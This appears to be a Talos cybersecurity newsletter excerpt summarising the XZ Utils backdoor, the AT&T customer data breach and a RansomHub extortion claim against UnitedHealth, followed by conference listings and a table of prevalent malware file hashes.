**The security community is still reflecting on the “What If” of the XZ backdoor** that was discovered and patched before threat actors could exploit it. A single Microsoft developer, who works on a different open-source project, found the backdoor in xz Utils for Linux distributions several weeks ago seemingly on accident, and is now being hailed as a hero by security researchers and professionals. Little is known about the user who had been building the backdoor in the open-source utility for at least two years. Had it been exploited, the vulnerability would have allowed its creator to hijack a user’s SSH connection and secretly run their own code on that user’s machine. The incident is highlighting networking’s reliance on open-source projects, which are often provided little resource and usually only maintained as a hobby, for free, by individuals who have no connection to the end users. The original creator of xz Utils worked alone for many years, before they had to open the project because of outside stressors and other work. Government officials have also been alarmed by the near-miss, and are now considering new ways to protect open-source software. (New York Times, Reuters) 

**AT&T now says that more than 51 million users were affected by a data breach** that exposed their personal information on a hacking forum. The cable, internet and cell service provider has still not said how the information was stolen. The incident dates back to 2021, when threat actor ShinyHunters initially offered the data for sale for $1 million. However, that data leaked last month on a hacking forum belonging to an actor known as “MajorNelson.” AT&T’s notification to affected customers stated that, "The \[exposed\] information varied by individual and account, but may have included full name, email address, mailing address, phone number, social security number, date of birth, AT&T account number and AT&T passcode." The company has also started filing required formal notifications with U.S. state authorities and regulators. While AT&T initially denied that the data belonged to them, reporters and researchers soon found that the information were related to AT&T and DirecTV (a subsidiary of AT&T) accounts. (BleepingComputer, TechCrunch) 

**Another ransomware group claims they’ve stolen data from United HealthCare, though there is little evidence yet to prove their claim.** Change Health, a subsidiary of United, was recently hit with a massive data breach, pausing millions of dollars of payments to doctors and healthcare facilities to be paused for more than a month. Now, the ransomware gang RansomHub claims it has 4TB of data, requesting an extortion payment from United, or it says it will start selling the data to the highest bidder 12 days from Monday. RansomHub claims the stolen information contains the sensitive data of U.S. military personnel and patients, as well as medical records and financial information. Blackcat initially stated they had stolen the data, but the group quickly deleted the post from their leak site. A person representing RansomHub told Reuters that a disgruntled affiliate of Blackcat gave the data to RansomHub after a previous planned payment fell through. (DarkReading, Reuters) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #178: Turla has been around for 20-plus years at this point, but they're still mixing things up 
*   Vulnerability in some TP-Link routers could lead to factory reset 
*   April’s Patch Tuesday includes 150 vulnerabilities, 60 which could lead to remote code execution 
*   Vietnamese Cybercrime Group CoralRaider Nets Financial Data 
*   Safeguarding Against CoralRaider: Protecting Your Data from Vietnamese Hackers 

**Upcoming events where you can find Talos **

**Botconf** **(April 23 - 26)** 

_Nice, Côte d'Azur, France_

> _This presentation from Chetan Raghuprasad details the Supershell C2 framework. Threat actors are using this framework massively and creating botnets with the Supershell implants._

**CARO Workshop 2024** **(May 1 - 3)** 

_Arlington, Virginia_

> Over the past year, we’ve observed a substantial uptick in attacks by YoroTrooper, a relatively nascent espionage-oriented threat actor operating against the Commonwealth of Independent Countries (CIS) since at least 2022. Asheer Malhotra's presentation at CARO 2024 will provide an overview of their various campaigns detailing the commodity and custom-built malware employed by the actor, their discovery and evolution in tactics. He will present a timeline of successful intrusions carried out by YoroTrooper targeting high-value individuals associated with CIS government agencies over the last two years.

**RSA** **(May 6 - 9)** 

_San Francisco, California_    

**Most prevalent malware files from Talos telemetry over the past week **

**SHA 256:** c67b03c0a91eaefffd2f2c79b5c26a2648b8d3c19a22cadf35453455ff08ead0  
**MD5:** 8c69830a50fb85d8a794fa46643493b2  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Dropper.Generic::1201

**SHA 256:** abaa1b89dca9655410f61d64de25990972db95d28738fc93bb7a8a69b347a6a6  
**MD5:** 22ae85259273bc4ea419584293eda886  
**Typical Filename:** KMSAuto++ x64.exe  
**Claimed Product:** KMSAuto++  
**Detection Name:** W32.File.MalParent

**SHA 256:** 161937ed1502c491748d055287898dd37af96405aeff48c2500b834f6739e72d  
**MD5:** fd743b55d530e0468805de0e83758fe9  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** b8aec57f7e9c193fcd9796cf22997605624b8b5f9bf5f0c6190e1090d426ee31  
**MD5:** 2fb86be791b4bb4389e55df0fec04eb7  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** W32.File.MalParent

**SHA 256:** 58d6fec4ba24c32d38c9a0c7c39df3cb0e91f500b323e841121d703c7b718681  
**MD5:** f1fe671bcefd4630e5ed8b87c9283534  
**Typical Filename:** KMSAuto Net.exe  
**Claimed Product:** KMSAuto Net  
**Detection Name:** PUA.Win.Tool.Hackkms::1201

The internet is already scary enough without April Fool’s jokes

The Windows Kernel suffers from a subkey list use-after-free vulnerability due to a mishandling of partial success in CmpAddSubKeyEx.

Tag

#windows